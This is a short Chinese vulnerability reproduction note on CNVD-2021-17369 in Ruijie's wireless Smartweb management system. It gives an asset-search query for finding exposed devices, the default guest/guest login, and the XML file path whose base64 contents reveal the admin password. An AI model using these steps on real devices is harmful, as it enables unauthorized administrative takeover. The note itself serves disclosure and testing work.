锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369

一、漏洞简介
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
二、影响版本
锐捷网络股份有限公司 无线smartweb管理系统
三、资产测绘
●hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"
●登录页面

1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387.png

四、漏洞复现
使用默认口令guest/guest登录系统

1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567.png

之后访问

/web/xml/webuser-auth.xml

1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9.png

base64解码解密后登录admin权限后台

1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b.png

更新: 2024-06-24 11:42:27
原文: https://www.yuque.com/xiaokp7/ocvun2/cg198cbfykmz8637